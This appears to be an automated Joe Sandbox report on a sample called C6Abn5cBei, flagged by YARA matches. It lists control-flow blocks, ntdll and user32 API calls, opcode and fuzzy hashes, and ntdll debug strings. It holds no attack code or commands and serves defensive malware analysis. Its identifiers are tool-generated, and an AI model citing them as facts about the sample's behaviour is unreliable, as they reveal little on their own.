                                                control_flow_graph for the function at 00417833 (rendered graph; executed/not-executed colouring omitted). Blocks: 417833-41784f, 417852 (call 42f523), 417857-41785c, 41785e-417861, 417862-417870 (call 42fb23), 417872-41787d (call 42fdc3), 417880-417891 (call 42dfc3), 417893-4178a7 (LdrLoadDll), 4178aa-4178ad.
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178A5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: f830006e6615140e8580b637796e91e8ab5f34b2beb2de568595537b0918178b
                                                • Instruction ID: ecafafc67528ff2c0a8c38e8f30d75d0d6e8b2cf75cf3923b583574fb7cade4a
                                                • Opcode Fuzzy Hash: f830006e6615140e8580b637796e91e8ab5f34b2beb2de568595537b0918178b
                                                • Instruction Fuzzy Hash: EF0140B1E00109B7DB10EAE1DC46FDEB3789F54308F4041A6E90897240F635EB58C755

                                                Control-flow Graph

                                                control_flow_graph 171 42c843-42c87f call 404883 call 42dac3 NtClose
                                                APIs
                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C87A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: d2ca64d7c9c952193a798ba580e50a54d6823f4a9d2982a8448f0dd46e0cb6d6
                                                • Instruction ID: 367e2f773cb965f5ce42092994158f42d79d17829f4288edd670b8861a2249ed
                                                • Opcode Fuzzy Hash: d2ca64d7c9c952193a798ba580e50a54d6823f4a9d2982a8448f0dd46e0cb6d6
                                                • Instruction Fuzzy Hash: 1AE04F366402147BD520EB5ADC42F9B779CDFC5760F408529FA08A7241CA71B9008BA4

                                                Control-flow Graph

                                                control_flow_graph 185 11c2b60-11c2b6c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: da173bf847d935c84a3bbf18d7cc32829601613df7c660ceb41b7bb5d719c80e
                                                • Instruction ID: 1fa837aa741d1e1e33eae37a04eb7f571862644d69e7d78882d37966da9d2894
                                                • Opcode Fuzzy Hash: da173bf847d935c84a3bbf18d7cc32829601613df7c660ceb41b7bb5d719c80e
                                                • Instruction Fuzzy Hash: 5690026520241003410971584514616401A97E0201B55C021E1015590DC62589916226
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6b454817d9cbf4caa480fdc7273c9d9e1f7015e48ed4b1df7ab72c5c17bca6b3
                                                • Instruction ID: 10f5023dafbd75a6c93424c35efb9070117c1a3715903d67ebfa6f485c7db155
                                                • Opcode Fuzzy Hash: 6b454817d9cbf4caa480fdc7273c9d9e1f7015e48ed4b1df7ab72c5c17bca6b3
                                                • Instruction Fuzzy Hash: 3F90023520141413D11571584604707001997D0241F95C412E0425558DD7568A52A222
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 83ca26cf003013b23479e1b4b8f545e72c28fe348ce848828effd64b07eac9cc
                                                • Instruction ID: d41869fc8749cd7b5704d2e3bca042a7fc5061ce87a51b42991f201e683db864
                                                • Opcode Fuzzy Hash: 83ca26cf003013b23479e1b4b8f545e72c28fe348ce848828effd64b07eac9cc
                                                • Instruction Fuzzy Hash: DD90023520149802D1147158850474A001597D0301F59C411E4425658DC79589917222
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ee05a24cfcae0d1909b27ff0708d1370073a3aa8039f52e50b35c742aae2679d
                                                • Instruction ID: d2937d0265d4de630469f33fbf60ff095eb1325efff43d668267c2e8bbe913b3
                                                • Opcode Fuzzy Hash: ee05a24cfcae0d1909b27ff0708d1370073a3aa8039f52e50b35c742aae2679d
                                                • Instruction Fuzzy Hash: 4090023560551402D10471584614706101597D0201F65C411E0425568DC7958A5166A3

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004140FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 7-6E2al6$7-6E2al6
                                                • API String ID: 1836367815-2814820216
                                                • Opcode ID: 5deaff572d0f5190d5fcf7c7a8d7add8a85d85076e62a73e8884596ca0f35128
                                                • Instruction ID: 8964f30d0ad93d8657fde06eb3f9f7b59b907bf4b03a41c1f31d7013d8072a87
                                                • Opcode Fuzzy Hash: 5deaff572d0f5190d5fcf7c7a8d7add8a85d85076e62a73e8884596ca0f35128
                                                • Instruction Fuzzy Hash: AA21AC72E041057AD720BBA9DC41EEFBB78EF85358F24806EFA04A7201D62D4D0387D4

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 7-6E2al6$7-6E2al6
                                                • API String ID: 0-2814820216
                                                • Opcode ID: 20bc7cafbaeb1015a9a1d73b68b2eab2612c3cefdf3a28a6ffa89f637762eec3
                                                • Instruction ID: 8e92d5b971038cc737c250f2bb71b05534d94f44fe295e91c63f42aea48a0353
                                                • Opcode Fuzzy Hash: 20bc7cafbaeb1015a9a1d73b68b2eab2612c3cefdf3a28a6ffa89f637762eec3
                                                • Instruction Fuzzy Hash: 79212EB2F441187ADB10DAD5AC81DEF77BCEF85354B45416AFB08F7201D1285D428BA4

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004140FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 7-6E2al6$7-6E2al6
                                                • API String ID: 1836367815-2814820216
                                                • Opcode ID: acf6c40fb78e07b1d2841ef5552d34e5e95fe5b18e49d67504bdff009d2bb76e
                                                • Instruction ID: 47bcbf16f948bd2efa43fc2af02dc92d76913aba3bbe8767e293d2df0de71043
                                                • Opcode Fuzzy Hash: acf6c40fb78e07b1d2841ef5552d34e5e95fe5b18e49d67504bdff009d2bb76e
                                                • Instruction Fuzzy Hash: 7B11C272D4416C7EEB10AAE59C82DEF7B7CDF81398F44806AFA14A7240D56D4E06CBA4

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004140FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 7-6E2al6$7-6E2al6
                                                • API String ID: 1836367815-2814820216
                                                • Opcode ID: 08fca1a0e1a0890d9208d996c0b528439d3dea7f914bf1ea09c325234879e7a1
                                                • Instruction ID: a796e303c3bda95c4014b7b5ddda5c90956674b21223f1a9010352b1be183124
                                                • Opcode Fuzzy Hash: 08fca1a0e1a0890d9208d996c0b528439d3dea7f914bf1ea09c325234879e7a1
                                                • Instruction Fuzzy Hash: 9301C4B2D0011C7ADB10AAE59C82DEF7B7CEF41398F45806AFA04A7241D6684E068BA5

                                                Control-flow Graph

                                                control_flow_graph 77 42cbd3-42cc17 call 404883 call 42dac3 RtlFreeHeap
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CC12
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: neA
                                                • API String ID: 3298025750-2757349852
                                                • Opcode ID: 6b7aaf6b10fa7884de83b95025984858c049f17bc640bafaf4448f72ac6a3306
                                                • Instruction ID: 9b298db65f8c6bf01d9dcfbfa9e7aa2d063570d1b727d24a4cf7208db5536a0f
                                                • Opcode Fuzzy Hash: 6b7aaf6b10fa7884de83b95025984858c049f17bc640bafaf4448f72ac6a3306
                                                • Instruction Fuzzy Hash: 74E06D722042147BC614EE99DC41EAB73ACEFC8714F408419FD08A7241DA70B9108BB8

                                                Control-flow Graph

                                                control_flow_graph 100 4178b3-4178bc 101 417912 100->101 102 4178be-4178d1 100->102 103 417915-41791f 101->103 104 4178a9 101->104 105 4178d3-4178d9 102->105 106 417878-417891 call 42fdc3 call 42dfc3 102->106 107 417920-417922 103->107 110 4178aa-4178ad 104->110 105->107 108 4178db 105->108 106->110 122 417893-4178a7 LdrLoadDll 106->122 111 417994-41799e 107->111 112 417924-417991 107->112 108->108 114 4179a0-4179a3 111->114 115 4179a4-4179bb call 42f583 111->115 123 4179bd-4179ee call 42f583 call 42b7d3 115->123 124 4179ef-417a0f call 42b7d3 115->124 122->110
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178A5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 0b6af81593f53b888134122441e15da9a80b41db1191adf4905be041ef5e5225
                                                • Instruction ID: 5d0be4d48f966b01517bdc42c4ba4bf6190df274e0818f87784c8df01efb4060
                                                • Opcode Fuzzy Hash: 0b6af81593f53b888134122441e15da9a80b41db1191adf4905be041ef5e5225
                                                • Instruction Fuzzy Hash: 613102B5A14209ABEB10EAA8DC42FEA7378EF44304F4445AEF908D7241F635DA5487D9

                                                Control-flow Graph

                                                control_flow_graph 147 417826-41782b 148 417839-41785c call 42f523 147->148 149 41782e 147->149 154 417862-417870 call 42fb23 148->154 155 41785e-417861 148->155 149->148 150 417895-4178a7 LdrLoadDll 149->150 153 4178aa-4178ad 150->153 158 417880-417891 call 42dfc3 154->158 159 417872-41787d call 42fdc3 154->159 158->153 164 417893-4178a7 LdrLoadDll 158->164 159->158 164->153
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178A5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: b45236e0de41b2749b61420101eba8697db62a92501e24b2d435ca03036e404e
                                                • Instruction ID: 3d823885dfb3bbc95cfc5e771c8059f83c63ec5343fb45df586f3dcac04713c6
                                                • Opcode Fuzzy Hash: b45236e0de41b2749b61420101eba8697db62a92501e24b2d435ca03036e404e
                                                • Instruction Fuzzy Hash: E8E05530D0C18977CB10DAB459091D8FBB0CF52208F0046EFD89C57143E1344958C342

                                                Control-flow Graph

                                                control_flow_graph 166 42cb83-42cbc7 call 404883 call 42dac3 RtlAllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,0041E63E,?,?,00000000,?,0041E63E,?,?,?), ref: 0042CBC2
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: c199910dec673787d95a21cb01d41e7f8052bbdc866d705f02d42feb43950ea4
                                                • Instruction ID: 477c5da0d8b10c1a74d97be33d87d72f42d7e0c6ee917c77eecc1667abc34b4e
                                                • Opcode Fuzzy Hash: c199910dec673787d95a21cb01d41e7f8052bbdc866d705f02d42feb43950ea4
                                                • Instruction Fuzzy Hash: D6E06DB22042187BD614EF59EC41EEB33ADEFC5710F404419FD08A7242CA70B9118BB9

                                                Control-flow Graph

                                                control_flow_graph 176 42cc23-42cc5f call 404883 call 42dac3 ExitProcess
                                                APIs
                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,41319B85,?,?,41319B85), ref: 0042CC5A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 41715c15822ad2d6df214d347bab8e0ea5d94cc086f80d85ed167616973f667e
                                                • Instruction ID: 99e8a95ecd3e46a4e8bc2f157e670209696b5ed5efda78eaef95c9c94b2a8784
                                                • Opcode Fuzzy Hash: 41715c15822ad2d6df214d347bab8e0ea5d94cc086f80d85ed167616973f667e
                                                • Instruction Fuzzy Hash: FEE04F766403547BC620BB5ADC41FD777ADDFC5764F008429FA4867181C6B1790087F4

                                                Control-flow Graph

                                                control_flow_graph 181 11c2c0a-11c2c0f 182 11c2c1f-11c2c26 LdrInitializeThunk 181->182 183 11c2c11-11c2c18 181->183
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 62599f371aa306ec3fab32d35960573db7fd628a6b0a69ceafc273b19a8874c4
                                                • Instruction ID: bdc0dbe846a975e7cebff4f6a6507c02b87ab3cb998b1761fa62cbb6fbe56fa1
                                                • Opcode Fuzzy Hash: 62599f371aa306ec3fab32d35960573db7fd628a6b0a69ceafc273b19a8874c4
                                                • Instruction Fuzzy Hash: 0AB09B719015D5C6DA15E7A44708717791077D0701F25C065D2030641F4738C1D1E276
                                                Strings
                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 01238E02
                                                • *** An Access Violation occurred in %ws:%s, xrefs: 01238F3F
                                                • *** enter .cxr %p for the context, xrefs: 01238FBD
                                                • <unknown>, xrefs: 01238D2E, 01238D81, 01238E00, 01238E49, 01238EC7, 01238F3E
                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01238DC4
                                                • Go determine why that thread has not released the critical section., xrefs: 01238E75
                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01238FEF
                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01238DB5
                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01238E3F
                                                • The instruction at %p tried to %s , xrefs: 01238F66
                                                • *** then kb to get the faulting stack, xrefs: 01238FCC
                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01238E4B
                                                • a NULL pointer, xrefs: 01238F90
                                                • *** Inpage error in %ws:%s, xrefs: 01238EC8
                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01238D8C
                                                • write to, xrefs: 01238F56
                                                • an invalid address, %p, xrefs: 01238F7F
                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01238E86
                                                • The instruction at %p referenced memory at %p., xrefs: 01238EE2
                                                • The resource is owned shared by %d threads, xrefs: 01238E2E
                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01238F34
                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01238F26
                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01238DD3
                                                • read from, xrefs: 01238F5D, 01238F62
                                                • The critical section is owned by thread %p., xrefs: 01238E69
                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01238F2D
                                                • This failed because of error %Ix., xrefs: 01238EF6
                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01238DA3
                                                • *** enter .exr %p for the exception record, xrefs: 01238FA1
                                                • The resource is owned exclusively by thread %p, xrefs: 01238E24
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                • API String ID: 0-108210295
                                                • Opcode ID: f0ba720239cb675e0bfa2fbe36ead5a582778ec7c89355d718b57d93918965e1
                                                • Instruction ID: d45806d81af48933475dd054fc96b11d3ed0d1050c8d4b11479209be52b04f18
                                                • Opcode Fuzzy Hash: f0ba720239cb675e0bfa2fbe36ead5a582778ec7c89355d718b57d93918965e1
                                                • Instruction Fuzzy Hash: 2C8119B5A74215BFDB2AAB19CC4AE7B3F35EF96B10F050248F6046F252E3B58401D762
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2160512332
                                                • Opcode ID: 78e824d5d890c98b89902fe01609bd59c407723a1a4b43221ffc4944ba396ad8
                                                • Instruction ID: 4288efe51a4ab1cf5b4f4699db283d14c95145db6c2e810db40776e5ff77928e
                                                • Opcode Fuzzy Hash: 78e824d5d890c98b89902fe01609bd59c407723a1a4b43221ffc4944ba396ad8
                                                • Instruction Fuzzy Hash: F6929271624742DFE726CF18C888B6BB7E8BB84754F044A1EFA94D7292D770E844CB52
                                                Strings
                                                • undeleted critical section in freed memory, xrefs: 011F542B
                                                • Thread identifier, xrefs: 011F553A
                                                • Critical section address., xrefs: 011F5502
                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011F540A, 011F5496, 011F5519
                                                • Address of the debug info found in the active list., xrefs: 011F54AE, 011F54FA
                                                • Thread is in a state in which it cannot own a critical section, xrefs: 011F5543
                                                • Invalid debug info address of this critical section, xrefs: 011F54B6
                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011F54CE
                                                • Critical section address, xrefs: 011F5425, 011F54BC, 011F5534
                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011F54E2
                                                • Critical section debug info address, xrefs: 011F541F, 011F552E
                                                • 8, xrefs: 011F52E3
                                                • double initialized or corrupted critical section, xrefs: 011F5508
                                                • corrupted critical section, xrefs: 011F54C2
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                • API String ID: 0-2368682639
                                                • Opcode ID: b710a75f5975da9e31b7cf18edc57cc56a0d510a6f906fc4e757db5f5e07bd29
                                                • Instruction ID: 29b2189cfa84ca2e4f9fc4bf9223d312ae7c79eba3feea08400c8cd58e7234b1
                                                • Opcode Fuzzy Hash: b710a75f5975da9e31b7cf18edc57cc56a0d510a6f906fc4e757db5f5e07bd29
                                                • Instruction Fuzzy Hash: 2381ADB1A40359EFDB68CF99C845BAEBBBAFB48B14F20411DF604B7650D371A941CB60
                                                Strings
                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 011F2602
                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 011F2506
                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011F24C0
                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 011F2498
                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 011F2624
                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 011F2412
                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 011F2409
                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011F25EB
                                                • @, xrefs: 011F259B
                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011F22E4
                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 011F261F
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                • API String ID: 0-4009184096
                                                • Opcode ID: 246bb3a9c5de41cfb62f77b45acfd6d7ad27a01ff3b51f3b6bbcdf78716f1082
                                                • Instruction ID: 818bfba3cd7109edaa4554f3fd8b87b618b50dd5c215031a81312f5a77c406df
                                                • Opcode Fuzzy Hash: 246bb3a9c5de41cfb62f77b45acfd6d7ad27a01ff3b51f3b6bbcdf78716f1082
                                                • Instruction Fuzzy Hash: A90270F1D042299BDB39DB54CD80BE9B7B8AB54704F0141DAEB09A7241DB70AF88CF59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                • API String ID: 0-2515994595
                                                • Opcode ID: 3898fb61eaf6ecb96b6dd8c52c65da877fdc7025bb3268967fe02647a72ab599
                                                • Instruction ID: 2ef0fa6c3c8e18d441357ebe815420a9e8b95e5bd3c3768f8c989257289da071
                                                • Opcode Fuzzy Hash: 3898fb61eaf6ecb96b6dd8c52c65da877fdc7025bb3268967fe02647a72ab599
                                                • Instruction Fuzzy Hash: DD51D171124322ABC32DDF288845BAFBBE8EF98654F54491DFA55C3290E770D608CB92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                • API String ID: 0-3197712848
                                                • Opcode ID: 74e2552ff357814fd0d5f55f65b6cbc8bcd931863a7cd3357ceb23e98b139dff
                                                • Instruction ID: 4e8ec9be2ed3846323b8d3427f43d1a305e3390f02a64c417d8d3d02104d6cfe
                                                • Opcode Fuzzy Hash: 74e2552ff357814fd0d5f55f65b6cbc8bcd931863a7cd3357ceb23e98b139dff
                                                • Instruction Fuzzy Hash: 3C12D0716087528FDB2DDB28D444BABBBE4BF84708F09051DF9A58B291E734D948CB93
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
